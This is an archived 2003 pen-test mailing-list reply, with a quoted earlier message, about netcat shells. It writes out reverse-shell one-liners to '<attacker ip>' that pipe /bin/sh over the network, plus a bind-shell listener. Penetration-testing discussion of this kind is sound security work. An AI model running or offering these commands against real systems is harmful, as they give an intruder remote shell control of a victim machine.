RE: command-line reverse connection tunnel?

From: Paul Bakker (bakker@fox-it.com)
Date: Tue Mar 18 2003 - 02:46:42 EST


The second command (pushing the shell), can be better written as:
nc <attacker ip> 1234 -e /bin/sh

(This works on both Linux/Windows environments with the current netcat versions,
probably with older versions as well)

This saves you the trouble of connecting stdin and stdout to two seperate ports
and gives you a shell as you expect it!..

Paul Bakker

-----Oorspronkelijk bericht-----
Van: Steven Gill [mailto:gman1120@hotmail.com]
Verzonden: maandag 17 maart 2003 4:27
Aan: filip@securax.be; pen-test@securityfocus.com
Onderwerp: RE: command-line reverse connection tunnel?

Yes, you can use netcat to send a shell back, but it is a pain to use it for
port redirection. E.G. for a shell you can:

nc -l -p <port> -e /bin/sh

or

nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and
stdout connected to the above ports respectively. But we want to use more
robust services other than shell, such as getting GUI on Windows via
terminal services or other more complex protocols.

----------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does. Plug your security holes now!
Download a free 15-day trial of VAM:
http://www2.stillsecure.com/download/sf_vuln_list.html



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:30 EDT